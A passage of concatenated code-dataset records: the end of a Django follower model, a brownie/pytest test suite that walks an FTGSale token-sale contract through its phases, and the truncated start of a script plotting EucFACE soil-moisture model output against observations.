__str__(self):\n return self.username\n\n\nUser = get_user_model()\n\n\nclass Follow(models.Model):\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='follower',\n verbose_name='Подписчик'\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='following',\n verbose_name='Автор'\n )\n\n class Meta:\n verbose_name = \"Подписка\"\n verbose_name_plural = \"Подписки\"\n ordering = ['user']\n constraints = [\n models.UniqueConstraint(\n fields=['user', 'author'],\n name='unique_follow_model'\n )\n ]\n\n def __str__(self):\n return self.user.username\n","repo_name":"NikitaChalykh/Foodgramm","sub_path":"backend/users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8156942118","text":"#!/usr/bin/python3\nimport pytest\nimport brownie\nfrom brownie import chain, network, FTGSale, accounts\nfrom scripts.deploy_FTGStaking import deploy_FTGStaking\n\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef ftgstaking(accounts, ftgtoken):\n # ftgstaking deployment\n ftgstaking = deploy_FTGStaking(ftgtoken.address, accounts[0])\n return ftgstaking\n\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef ntt(accounts, NTT):\n # accounts[0] deploys NTT contract\n ntt = NTT.deploy(\"NTT\", 18, {\"from\": accounts[0]})\n return ntt\n\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef ftgsale(accounts, ntt, ftgstaking, ftgtoken, investtoken):\n # FTGSale deployment\n _totalTokensToSell = 10_000_000 * 10 ** 18\n _totalToRaise = 100_000 * 10 ** 18\n # token price (price of 1 token = 10**18 \"tokenWei\" in investToken)\n _tokenPrice = int(_totalToRaise / _totalTokensToSell * 10 ** 18)\n print(\"_tokenPrice = \", _tokenPrice)\n # accounts[0] deploys FTGSale contract\n ftgsale = FTGSale.deploy(\n ntt,\n investtoken,\n ftgstaking,\n _tokenPrice,\n _totalTokensToSell,\n _totalToRaise,\n {\"from\": accounts[0]},\n )\n # add ownership of ntt to ftgsale\n ntt.addOwner(ftgsale, {\"from\": accounts[0]})\n return ftgsale\n\n\ndef test_setup_phase(ftgsale, ntt, accounts, ftgtoken, investtoken):\n print(\"********************Setup Phase Tests********************\")\n # verifies that we are in setup phase of the sale\n assert ftgsale.salePhase() == 0\n # Tiers enum codes\n NONE = 0\n RUBY = 1\n SAPPHIRE = 2\n EMERALD = 3\n DIAMOND = 4\n\n # definition of Sale's Phases durations\n phaseDuration = 86400 # one day\n ftgsale.setPhasesDurations(phaseDuration, phaseDuration, phaseDuration)\n assert ftgsale.registrationPhaseDuration() == phaseDuration\n # definition of Tiers minimum ftg locked staking\n RUBY_MIN = 100_000 * 10 ** 18\n SAPPHIRE_MIN = 250_000 * 10 ** 18\n EMERALD_MIN = 500_000 * 10 ** 18\n DIAMOND_MIN = 1_000_000 * 10 ** 18\n ftgsale.setTiersMinFTGStakings(RUBY_MIN, SAPPHIRE_MIN, EMERALD_MIN, DIAMOND_MIN)\n assert ftgsale.tiersMinFTGStaking(NONE) == 0\n assert ftgsale.tiersMinFTGStaking(RUBY) == 100_000 * 10 ** 18\n assert ftgsale.tiersMinFTGStaking(SAPPHIRE) == 250_000 * 10 ** 18\n assert ftgsale.tiersMinFTGStaking(EMERALD) == 500_000 * 10 ** 18\n assert ftgsale.tiersMinFTGStaking(DIAMOND) == 1_000_000 * 10 ** 18\n # definition of tiers allocation factors\n ftgsale.setTiersTokensAllocationFactors(2, 4, 8, {\"from\": accounts[0]})\n assert ftgsale.tiersTokensAllocationFactor(RUBY) == 1\n assert ftgsale.tiersTokensAllocationFactor(SAPPHIRE) == 2\n assert ftgsale.tiersTokensAllocationFactor(EMERALD) == 4\n assert 
ftgsale.tiersTokensAllocationFactor(DIAMOND) == 8\n # test that factors not in ascending order are rejected\n with brownie.reverts(\"factors must be increasing from lower to higher tiers\"):\n ftgsale.setTiersTokensAllocationFactors(3, 2, 8, {\"from\": accounts[0]})\n # admin launches the next phase\n ftgsale.launchNextPhase({\"from\": accounts[0]})\n assert ftgsale.salePhase() == 1\n # verification that we can no longer access the setup functions\n with brownie.reverts(\"not setup phase\"):\n phaseDuration = 86400 * 2 # two days\n ftgsale.setPhasesDurations(phaseDuration, phaseDuration, phaseDuration)\n\n\n@pytest.fixture\ndef setup_durations(accounts, ftgsale):\n # definition of Sale's Phases durations\n phaseDuration = 86400 # one day\n return ftgsale.setPhasesDurations(phaseDuration, phaseDuration, phaseDuration)\n\n\n@pytest.fixture\ndef setup_tiersmin(accounts, ftgsale):\n # definition of Tiers minimum ftg locked staking\n RUBY_MIN = 100_000 * 10 ** 18\n SAPPHIRE_MIN = 250_000 * 10 ** 18\n EMERALD_MIN = 500_000 * 10 ** 18\n DIAMOND_MIN = 1_000_000 * 10 ** 18\n return ftgsale.setTiersMinFTGStakings(\n RUBY_MIN, SAPPHIRE_MIN, EMERALD_MIN, DIAMOND_MIN\n )\n\n\n@pytest.fixture\ndef setup_factors(accounts, ftgsale):\n # definition of tiers allocation factors\n return ftgsale.setTiersTokensAllocationFactors(2, 4, 8, {\"from\": accounts[0]})\n\n\ndef test_registration_phase(\n setup_durations,\n setup_tiersmin,\n setup_factors,\n ftgsale,\n ftgstaking,\n ntt,\n accounts,\n ftgtoken,\n investtoken,\n):\n print(\"********************Registration Phase Tests********************\")\n # setup fixtures applied\n # Tiers enum codes\n NONE = 0\n RUBY = 1\n SAPPHIRE = 2\n EMERALD = 3\n DIAMOND = 4\n # we launch next phase\n ftgsale.launchNextPhase({\"from\": accounts[0]})\n # verifies that we are in registration phase of the sale\n assert ftgsale.salePhase() == 1\n # stakeholders prepare to participate\n # BEWARE OF 5% FEES APPLYING ON STAKINGS!\n # staking must be > tier_min_target/0.95\n # for Ruby, min staking > 105_264 ftg\n # for Sapphire, min staking > 263_158 ftg\n # for Emerald, min staking > 526_316 ftg\n # for Diamond, min staking > 1_052_631 ftg\n staking0 = 530_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking0, {\"from\": accounts[0]})\n ftgstaking.stake(staking0, 5184000, {\"from\": accounts[0]})\n staking1 = 1_100_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking1, {\"from\": accounts[1]})\n ftgstaking.stake(staking1, 2592000, {\"from\": accounts[1]})\n staking2 = 110_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking2, {\"from\": accounts[2]})\n ftgstaking.stake(staking2, 3000000, {\"from\": accounts[2]})\n staking3 = 60_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking3, {\"from\": accounts[3]})\n ftgstaking.stake(staking3, 6000000, {\"from\": accounts[3]})\n staking4 = 265_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking4, {\"from\": accounts[4]})\n ftgstaking.stake(staking4, 2592000, {\"from\": accounts[4]})\n # registration\n ftgsale.registerForSale({\"from\": accounts[0]})\n tx = ftgsale.registerForSale({\"from\": accounts[1]})\n print(tx.events)\n ftgsale.registerForSale({\"from\": accounts[2]})\n # verification of their registration\n print(\n \"checkParticipantLockedStaking(accounts[0], 2592000)=\",\n ftgstaking.checkParticipantLockedStaking(accounts[0], 2592000).return_value,\n )\n assert ftgsale.participants(accounts[0]) == (0, 0, True, EMERALD)\n assert ftgsale.participants(accounts[1]) == (0, 0, True, DIAMOND)\n assert ftgsale.participants(accounts[2]) == (0, 0, 
True, RUBY)\n # verification that the nb of participants per Tier was correctly incremented\n assert ftgsale.tiersNbOFParticipants(RUBY) == 1\n assert ftgsale.tiersNbOFParticipants(DIAMOND) == 1\n # verifies that a participant cannot register a second time\n with brownie.reverts(\"already registered\"):\n ftgsale.registerForSale({\"from\": accounts[2]})\n # verifies that a participant of NONE Tier cannot register\n with brownie.reverts(\"Not enough locked Staking\"):\n ftgsale.registerForSale({\"from\": accounts[3]})\n # time travel 86500 secs = 1 day and 100 secs\n timeTravel = 86500\n chain.sleep(timeTravel)\n # registration should be over\n # any registration attempts should be reverted\n with brownie.reverts(\"Registration Phase ended\"):\n ftgsale.registerForSale({\"from\": accounts[4]})\n\n\n# registration_phase_fixtures\n\n\ndef participants_stakings(ftgtoken, ftgstaking):\n staking0 = 530_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking0, {\"from\": accounts[0]})\n ftgstaking.stake(staking0, 5184000, {\"from\": accounts[0]})\n staking1 = 1_100_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking1, {\"from\": accounts[1]})\n ftgstaking.stake(staking1, 2592000, {\"from\": accounts[1]})\n staking2 = 110_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking2, {\"from\": accounts[2]})\n ftgstaking.stake(staking2, 3000000, {\"from\": accounts[2]})\n staking3 = 160_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking3, {\"from\": accounts[3]})\n ftgstaking.stake(staking3, 6000000, {\"from\": accounts[3]})\n staking4 = 265_000 * 10 ** 18\n ftgtoken.approve(ftgstaking, staking4, {\"from\": accounts[4]})\n ftgstaking.stake(staking4, 2592000, {\"from\": accounts[4]})\n\n\n@pytest.fixture\ndef participants_preparation(ftgtoken, ftgstaking):\n # participants prepare for sale participation\n return participants_stakings(ftgtoken, ftgstaking)\n\n\ndef registration(ftgsale):\n # admin launch registration phase\n ftgsale.launchNextPhase({\"from\": accounts[0]})\n # participants register\n for i in range(5):\n ftgsale.registerForSale({\"from\": accounts[i]})\n\n\n@pytest.fixture\ndef registration_phase(ftgsale):\n # admin launch registration and participants register\n return registration(ftgsale)\n\n\n# guaranteed pool phase tests\ndef test_guaranteed_pool_phase(\n setup_durations,\n setup_tiersmin,\n setup_factors,\n participants_preparation,\n registration_phase,\n ftgsale,\n ftgstaking,\n ntt,\n accounts,\n ftgtoken,\n investtoken,\n):\n print(\"********************Guaranteed Phase Tests********************\")\n # Tiers enum codes\n NONE = 0\n RUBY = 1\n SAPPHIRE = 2\n EMERALD = 3\n DIAMOND = 4\n # setup fixtures applied...\n # registration fixtures applied...:\n # verif accounts[0] staking for instance:\n assert (\n ftgstaking.getStakings(accounts[0])[-1][0]\n == 530000 * 10 ** 18 - ftgstaking.STAKING_FEE() * 530000 * 10 ** 18 / 100\n )\n # verif accounts[4] registration for instance\n assert ftgsale.participants(accounts[4]) == (0, 0, True, SAPPHIRE)\n # time travel to end registration phase\n chain.sleep(ftgsale.registrationPhaseDuration() + 60)\n # admin launch guaranteed phase\n ftgsale.launchNextPhase({\"from\": accounts[0]})\n # verif that we are in guaranteed phase of the sale\n assert ftgsale.salePhase() == 2\n # check maxNbTokensPerPartRuby calculation\n print(\"ftgsale.maxNbTokensPerPartRuby =\", ftgsale.maxNbTokensPerPartRuby())\n sumFNP = 0\n expectedNbParticipants = [0, 2, 1, 1, 1]\n for i in range(1, 5):\n # check nb of participants per Tier\n print(\"Tiers \", i, \": nb of 
participants =\", ftgsale.tiersNbOFParticipants(i))\n assert ftgsale.tiersNbOFParticipants(i) == expectedNbParticipants[i]\n # calculate sumFNP\n sumFNP += ftgsale.tiersTokensAllocationFactor(\n i\n ) * ftgsale.tiersNbOFParticipants(i)\n # cheating a bit this test since python precision diff de pbr/math precision\n assert round(ftgsale.maxNbTokensPerPartRuby() / 10 ** 9, 0) == round(\n int(ftgsale.totalTokensToSell() / sumFNP) / 10 ** 9, 0\n )\n for i in range(1, 5):\n maxNb = (\n ftgsale.tiersTokensAllocationFactor(i) * ftgsale.maxNbTokensPerPartRuby()\n )\n print(\n \"Tier\", i, \"max purchaseable tokens per participant in GP:\", maxNb,\n )\n assert maxNb == ftgsale.maxNbTokensPerPartRuby() * 2 ** (i - 1)\n # check total number of participants\n ftgsale.NbOfParticipants() == 5\n # participants buy tokens\n print(\"tokenPrice =\", ftgsale.tokenPrice())\n tokenAmount0 = 100_000 * 10 ** 18 # (in token)\n investTokenAmount0 = (\n tokenAmount0 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n print(\"investTokenAmount0 =\", investTokenAmount0, \"investTokenWei\")\n investtoken.approve(ftgsale, investTokenAmount0, {\"from\": accounts[0]})\n tx = ftgsale.buytoken(tokenAmount0, {\"from\": accounts[0]})\n print(tx.events)\n tokenAmount2 = 400_000 * 10 ** 18 # (in token)\n investTokenAmount2 = (\n tokenAmount2 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n print(\"investTokenAmount2 =\", investTokenAmount2, \"investTokenWei\")\n investtoken.approve(ftgsale, investTokenAmount2, {\"from\": accounts[2]})\n ftgsale.buytoken(tokenAmount2, {\"from\": accounts[2]})\n # verify balances\n assert ftgsale.tokensSold() == tokenAmount0 + tokenAmount2\n assert ftgsale.investmentRaised() == investTokenAmount0 + investTokenAmount2\n print(\n \"ftgsale.participants(accounts[0]) =\", ftgsale.participants(accounts[0]),\n )\n print(\n \"ftgsale.participants(accounts[2]) =\", ftgsale.participants(accounts[2]),\n )\n assert ftgsale.participants(accounts[0])[0] == tokenAmount0\n assert ftgsale.participants(accounts[2])[0] == tokenAmount2\n assert ntt.balanceOf(accounts[0]) == tokenAmount0\n assert ntt.balanceOf(accounts[2]) == tokenAmount2\n # verify cannot buy more than entitled\n # accounts[4] is SAPPHIRE TIER, he cannot purchase more than 1_250_000 tokens\n tokenAmount4 = 1_300_000 * 10 ** 18 # (in token)\n investTokenAmount4 = (\n tokenAmount4 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n print(\"investTokenAmount4 =\", investTokenAmount4, \"investTokenWei\")\n investtoken.approve(ftgsale, investTokenAmount4, {\"from\": accounts[4]})\n with brownie.reverts(\"Maximum allowed number of tokens exceeded\"):\n ftgsale.buytoken(tokenAmount4, {\"from\": accounts[4]})\n # verify cannot buy when pool ended\n # time travel to end guaranteed pool phase\n chain.sleep(ftgsale.guaranteedPoolPhaseDuration() + 60)\n tokenAmount4 = 1_000_000 * 10 ** 18 # (in token)\n investTokenAmount4 = (\n tokenAmount4 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n print(\"second trial investTokenAmount4 =\", investTokenAmount4, \"investTokenWei\")\n investtoken.approve(ftgsale, investTokenAmount4, {\"from\": accounts[4]})\n with brownie.reverts(\"Guaranteed Pool Phase ended\"):\n ftgsale.buytoken(tokenAmount4, {\"from\": accounts[4]})\n\n\n# public pool phase fixtures\ndef guaranteed_pool(ftgsale, investtoken):\n # time travel to end registration phase\n chain.sleep(ftgsale.registrationPhaseDuration() + 60)\n # admin launch guaranteed phase\n ftgsale.launchNextPhase({\"from\": accounts[0]})\n # participants 
buy tokens\n print(\"tokenPrice =\", ftgsale.tokenPrice())\n tokenAmount0 = 2_000_000 * 10 ** 18 # (in token)\n investTokenAmount0 = (\n tokenAmount0 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount0, {\"from\": accounts[0]})\n ftgsale.buytoken(tokenAmount0, {\"from\": accounts[0]})\n tokenAmount1 = 4_000_000 * 10 ** 18 # (in token)\n investTokenAmount1 = (\n tokenAmount1 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount1, {\"from\": accounts[1]})\n ftgsale.buytoken(tokenAmount1, {\"from\": accounts[1]})\n tokenAmount2 = 400_000 * 10 ** 18 # (in token)\n investTokenAmount2 = (\n tokenAmount2 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount2, {\"from\": accounts[2]})\n ftgsale.buytoken(tokenAmount2, {\"from\": accounts[2]})\n tokenAmount3 = 625_000 * 10 ** 18 # (in token)\n investTokenAmount3 = (\n tokenAmount3 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount3, {\"from\": accounts[3]})\n ftgsale.buytoken(tokenAmount3, {\"from\": accounts[3]})\n tokenAmount4 = 1_000_000 * 10 ** 18 # (in token)\n investTokenAmount4 = (\n tokenAmount4 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount4, {\"from\": accounts[4]})\n ftgsale.buytoken(tokenAmount4, {\"from\": accounts[4]})\n # time travel to end guaranteed pool phase\n chain.sleep(ftgsale.guaranteedPoolPhaseDuration() + 60)\n # admin launch guaranteed phase\n ftgsale.launchNextPhase({\"from\": accounts[0]})\n\n\n@pytest.fixture\ndef guaranteed_pool_phase(ftgsale, investtoken):\n # guaranteed pool takes place\n return guaranteed_pool(ftgsale, investtoken)\n\n\n# public pool tests\ndef test_public_pool_phase(\n setup_durations,\n setup_tiersmin,\n setup_factors,\n participants_preparation,\n registration_phase,\n guaranteed_pool_phase,\n ftgsale,\n ftgstaking,\n ntt,\n accounts,\n ftgtoken,\n investtoken,\n):\n print(\"********************Guaranteed Phase Tests********************\")\n # Tiers enum codes\n NONE = 0\n RUBY = 1\n SAPPHIRE = 2\n EMERALD = 3\n DIAMOND = 4\n # setup fixtures applied...\n # registration fixtures applied...\n # guaranteed pool fixtures applied:\n # verif that we are in public pool phase of the sale\n assert ftgsale.salePhase() == 3\n # verifies remaining token\n print(\"NbOfParticipants = \", ftgsale.NbOfParticipants())\n assert ftgsale.NbOfParticipants() == 5\n print(\"totalTokensToSell =\", ftgsale.totalTokensToSell())\n assert ftgsale.tokensSold() == 8_025_000 * 10 ** 18\n print(\"investmentRaised =\", ftgsale.investmentRaised())\n\n print(\"Public Pool tokens for sale at start =\", ftgsale.publicPoolTokensAtPPStart())\n assert (\n ftgsale.publicPoolTokensAtPPStart()\n == ftgsale.totalTokensToSell() - ftgsale.tokensSold()\n )\n print(\"maxNbTokensPerPartAtPPStart =\", ftgsale.maxNbTokensPerPartAtPPStart())\n assert (\n ftgsale.maxNbTokensPerPartAtPPStart()\n == ftgsale.publicPoolTokensAtPPStart() / ftgsale.NbOfParticipants()\n )\n # verifies max number of purchaseable token evolves as expected with time\n # at public phase start\n # works fine, it requires function for testing purpose to be added in contract:\n \"\"\" //function for testing purpose\n /* function updateMaxNbTokensPerPartAtPP()\n public\n returns (uint256 maxNbTokensPerPartAtPP)\n {\n uint256 publicPoolTokens = totalTokensToSell - tokensSold;\n if (\n 4 * (block.timestamp - 
publicPoolPhaseStart) <\n 3 * publicPoolPhaseDuration\n ) {\n maxNbTokensPerPartAtPP =\n maxNbTokensPerPartAtPPStart +\n PRBMath.mulDiv(\n (block.timestamp - publicPoolPhaseStart),\n 4 * (publicPoolTokens - maxNbTokensPerPartAtPPStart),\n 3 * publicPoolPhaseDuration\n );\n } else {\n maxNbTokensPerPartAtPP = publicPoolTokens;\n }\n } */ \"\"\"\n\n \"\"\" maxNbTokensPerPartAtPP = ftgsale.updateMaxNbTokensPerPartAtPP.call(\n {\"from\": accounts[0]}\n )\n print(\"maxNbTokensPerPartAtPP at start = \", maxNbTokensPerPartAtPP)\n assert maxNbTokensPerPartAtPP == ftgsale.maxNbTokensPerPartAtPPStart()\n print(\"time at start = \", chain.time())\n # time travel to about one third of public pool phase duration\n chain.sleep(int(ftgsale.publicPoolPhaseDuration() * 0.33))\n print(\"time at one third of public pool phase = \", chain.time())\n print(\n \"(chain.time() - ftgsale.publicPoolPhaseStart())=\",\n (chain.time() - ftgsale.publicPoolPhaseStart()),\n )\n # verification of maxNbTokensPerPartAtPP calculation\n publicPoolTokens = ftgsale.totalTokensToSell() - ftgsale.tokensSold()\n pythonMaxNbTokensPerPartAtPP = ftgsale.maxNbTokensPerPartAtPPStart() + int(\n (chain.time() - ftgsale.publicPoolPhaseStart())\n * 4\n * (publicPoolTokens - ftgsale.maxNbTokensPerPartAtPPStart())\n / 3\n / ftgsale.publicPoolPhaseDuration()\n )\n tx = ftgsale.updateMaxNbTokensPerPartAtPP()\n print(tx.events)\n print(\"maxNbTokensPerPartAtPP at one third of public phase = \", tx.return_value)\n # cheating a bit this test since python precision diff de pbr/math precision\n assert round(tx.return_value / 10 ** 9, 0) == round(\n pythonMaxNbTokensPerPartAtPP / 10 ** 9, 0\n )\n # successive tokens purchase by accounts[2]\n # first purchase above maxNbTokensPerPartAtPPStart (395000) but below maxNbTokensPerPartAtPP\n # at one third of the public phase (1090200 tokens)\n tokenAmount2 = 800_000 * 10 ** 18 # (in token)\n investTokenAmount2 = (\n tokenAmount2 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n print(\"investTokenAmount2 =\", investTokenAmount2)\n investtoken.approve(ftgsale, investTokenAmount2, {\"from\": accounts[2]})\n ftgsale.buytoken(tokenAmount2, {\"from\": accounts[2]})\n # second purchase exceeding max purchase amount at one third of public pool phase\n # So it should be reverted\n tokenAmount2 = 300_000 * 10 ** 18 # (in token)\n investTokenAmount2 = (\n tokenAmount2 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount2, {\"from\": accounts[2]})\n with brownie.reverts(\"Maximum allowed number of tokens exceeded\"):\n ftgsale.buytoken(tokenAmount2, {\"from\": accounts[2]})\n # time travel to about 83% of public pool phase duration\n chain.sleep(int(ftgsale.publicPoolPhaseDuration() * 0.50))\n # verif of max purchaseable tokens should be limited by\n # the number of remaining tokens only i.e. 
publicPoolTokens\n tx = ftgsale.updateMaxNbTokensPerPartAtPP()\n publicPoolTokens = ftgsale.totalTokensToSell() - ftgsale.tokensSold()\n assert publicPoolTokens == ftgsale.totalTokensToSell() - (\n 8_025_000 * 10 ** 18 + 800_000 * 10 ** 18\n )\n assert tx.return_value == publicPoolTokens\n print(\"maxNbTokensPerPartAtPP at 83% of public phase = \", tx.return_value)\n # new purchase by accounts[1] purchasing al remaining tokens\n tokenAmount1 = tx.return_value # (in token)\n investTokenAmount1 = (\n tokenAmount1 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount1, {\"from\": accounts[1]})\n ftgsale.buytoken(tokenAmount1, {\"from\": accounts[1]})\n # verify balances\n print(\n \"ftgsale.participants(accounts[1]) =\",\n ftgsale.participants(accounts[1]),\n )\n print(\n \"ftgsale.participants(accounts[2]) =\",\n ftgsale.participants(accounts[2]),\n )\n assert ftgsale.participants(accounts[1])[1] == tokenAmount1\n assert ftgsale.participants(accounts[2])[1] == 800000 * 10 ** 18\n assert ntt.balanceOf(accounts[1]) == (4_000_000 * 10 ** 18 + tokenAmount1)\n assert ntt.balanceOf(accounts[2]) == (400_000 * 10 ** 18 + 800_000 * 10 ** 18)\n print(\"totalToRaise =\", ftgsale.totalToRaise())\n print(\"investmentRaised =\", ftgsale.investmentRaised())\n print(\"tokensSold =\", ftgsale.tokensSold())\n # last purchase should trigger the end of the sale since totalToRaise has been reached\n assert ftgsale.salePhase() == 4 \"\"\"\n\n\n# saleCompleted fixtures\n\n\ndef public_pool(ftgsale, investtoken):\n # time travel to about one third of public pool phase duration\n chain.sleep(int(ftgsale.publicPoolPhaseDuration() * 0.33))\n # at one third of the public phase (1090200 purchasable tokens per part)\n tokenAmount2 = 500_000 * 10 ** 18 # (in token)\n investTokenAmount2 = (\n tokenAmount2 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount2, {\"from\": accounts[2]})\n ftgsale.buytoken(tokenAmount2, {\"from\": accounts[2]})\n tokenAmount4 = 700_000 * 10 ** 18 # (in token)\n investTokenAmount4 = (\n tokenAmount4 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount4, {\"from\": accounts[4]})\n ftgsale.buytoken(tokenAmount4, {\"from\": accounts[4]})\n # time travel to about 83% of public pool phase duration\n # after 75% of public pool phase passed, no limitation of number\n # of purchasable tokens by participant\n chain.sleep(int(ftgsale.publicPoolPhaseDuration() * 0.50))\n # accounts[1] purchase all remaining tokens\n publicPoolTokens = ftgsale.totalTokensToSell() - ftgsale.tokensSold()\n tokenAmount1 = publicPoolTokens # (in token)\n investTokenAmount1 = (\n tokenAmount1 * ftgsale.tokenPrice() / 10 ** 18\n ) # in investToken\n investtoken.approve(ftgsale, investTokenAmount1, {\"from\": accounts[1]})\n ftgsale.buytoken(tokenAmount1, {\"from\": accounts[1]})\n\n\n@pytest.fixture\ndef public_pool_phase(ftgsale, investtoken):\n # guaranteed pool takes place\n return public_pool(ftgsale, investtoken)\n\n\n@pytest.fixture\ndef saletoken(MockFTGToken, accounts):\n print(\"saletoken deployment by accounts[0]=\", accounts[0])\n return MockFTGToken.deploy(20_000_000 * 10 ** 18, {\"from\": accounts[0]})\n\n\n@pytest.fixture\ndef redeemer(Redeemer, ntt, saletoken):\n return Redeemer.deploy(ntt, saletoken, {\"from\": accounts[0]})\n\n\n# salecompleted tests\n\n\ndef test_sale_completed(\n setup_durations,\n setup_tiersmin,\n setup_factors,\n participants_preparation,\n 
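# fixture chain below replays the whole sale before the assertions run: registration, guaranteed pool, then public pool\n 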
registration_phase,\n guaranteed_pool_phase,\n public_pool_phase,\n saletoken,\n redeemer,\n ftgsale,\n ftgstaking,\n ntt,\n accounts,\n ftgtoken,\n investtoken,\n):\n print(\"********************Sale completed Phase Tests********************\")\n\n # setup fixtures applied...\n # registration fixtures applied...\n # guaranteed pool fixtures applied...\n # public pool fixtures aplied:\n # last purchase should trigger the end of the sale since totalToRaise has been reached\n assert ftgsale.salePhase() == 4\n # owner of saletoken to send the saletoken to redeemer\n # ftgtoken.transfer(redeemer, 100 * 10**18, {\"from\": accounts[0]})\n saletoken.approve(redeemer, ftgsale.totalTokensToSell(), {\"from\": accounts[0]})\n redeemer.depositSaleTokens(ftgsale.totalTokensToSell(), {\"from\": accounts[0]})\n # Redeemer must be made owner of ntt\n ntt.addOwner(redeemer, {\"from\": accounts[0]})\n # At this point, the Redeemer contract has the saleTokens, participants can\n # redeem their ntt for real tokens\n redeemer.claim({\"from\": accounts[3]})\n assert saletoken.balanceOf(accounts[3]) == 625_000 * 10 ** 18\n redeemer.claim({\"from\": accounts[2]})\n assert saletoken.balanceOf(accounts[2]) == 900_000 * 10 ** 18\n\n","repo_name":"Ongoapp-org/contracts","sub_path":"tests/test_ftgSale_general.py","file_name":"test_ftgSale_general.py","file_ext":"py","file_size_in_byte":25697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18775539580","text":"#!/usr/bin/env python\n\n\"\"\"\nPlot EucFACE soil moisture at observated dates\n\nThat's all folks.\n\"\"\"\n\n__author__ = \"MU Mengyuan\"\n__version__ = \"2019-10-06\"\n__changefrom__ = 'plot_eucface_swc_cable_vs_obs.py'\n\nimport os\nimport sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.colors\nfrom matplotlib import ticker\nimport datetime as dt\nimport netCDF4 as nc\nfrom scipy.interpolate import griddata\n\ndef main(fobs, fcable, case_name, ring, layer, cable_version):\n\n tdr = pd.read_csv(fobs, usecols = ['Ring','Date','swc.tdr'])\n tdr['Date'] = pd.to_datetime(tdr['Date'],format=\"%Y-%m-%d\",infer_datetime_format=False)\n tdr['Date'] = tdr['Date'] - pd.datetime(2011,12,31)\n tdr['Date'] = tdr['Date'].dt.days\n tdr = tdr.sort_values(by=['Date'])\n # divide neo into groups\n if ring == 'amb':\n subset = tdr[(tdr['Ring'].isin(['R2','R3','R6'])) & (tdr.Date > 366)]\n elif ring == 'ele':\n subset = tdr[(tdr['Ring'].isin(['R1','R4','R5'])) & (tdr.Date > 366)]\n else:\n subset = tdr[(tdr['Ring'].isin([ring])) & (tdr.Date > 366)]\n\n subset = subset.groupby(by=[\"Date\"]).mean()/100.\n subset = subset.xs('swc.tdr', axis=1, drop_level=True)\n #print(subset)\n# _________________________ CABLE ___________________________\n cable = nc.Dataset(fcable, 'r')\n Time = nc.num2date(cable.variables['time'][:],cable.variables['time'].units)\n SoilMoist = pd.DataFrame(cable.variables['SoilMoist'][:,0,0,0], columns=['SoilMoist'])\n\n SoilMoist['SoilMoist'] = ( cable.variables['SoilMoist'][:,0,0,0]*0.022 \\\n + cable.variables['SoilMoist'][:,1,0,0]*0.058 \\\n + cable.variables['SoilMoist'][:,2,0,0]*0.154 \\\n + cable.variables['SoilMoist'][:,3,0,0]*(0.5-0.022-0.058-0.154) )/0.5\n SoilMoist['dates'] = Time\n SoilMoist = SoilMoist.set_index('dates')\n SoilMoist = SoilMoist.resample(\"D\").agg('mean')\n SoilMoist.index = SoilMoist.index - pd.datetime(2011,12,31)\n SoilMoist.index = SoilMoist.index.days\n SoilMoist = SoilMoist.sort_values(by=['dates'])\n\n TVeg = 
pd.DataFrame(cable.variables['TVeg'][:,0,0],columns=['TVeg'])\n TVeg = TVeg*1800.\n TVeg['dates'] = Time\n TVeg = TVeg.set_index('dates')\n TVeg = TVeg.resample(\"D\").agg('sum')\n TVeg.index = TVeg.index - pd.datetime(2011,12,31)\n TVeg.index = TVeg.index.days\n\n ESoil = pd.DataFrame(cable.variables['ESoil'][:,0,0],columns=['ESoil'])\n ESoil = ESoil*1800.\n ESoil['dates'] = Time\n ESoil = ESoil.set_index('dates')\n ESoil = ESoil.resample(\"D\").agg('sum')\n ESoil.index = ESoil.index - pd.datetime(2011,12,31)\n ESoil.index = ESoil.index.days\n\n\n '''\n Rainf = pd.DataFrame(cable.variables['Rainf'][:,0,0],columns=['Rainf'])\n Rainf = Rainf*1800.\n Rainf['dates'] = Time\n Rainf = Rainf.set_index('dates')\n Rainf = Rainf.resample(\"D\").agg('sum')\n Rainf.index = Rainf.index - pd.datetime(2011,12,31)\n Rainf.index = Rainf.index.days\n\n Fwsoil = pd.DataFrame(cable.variables['Fwsoil'][:,0,0],columns=['Fwsoil'])\n Fwsoil['dates'] = Time\n Fwsoil = Fwsoil.set_index('dates')\n Fwsoil = 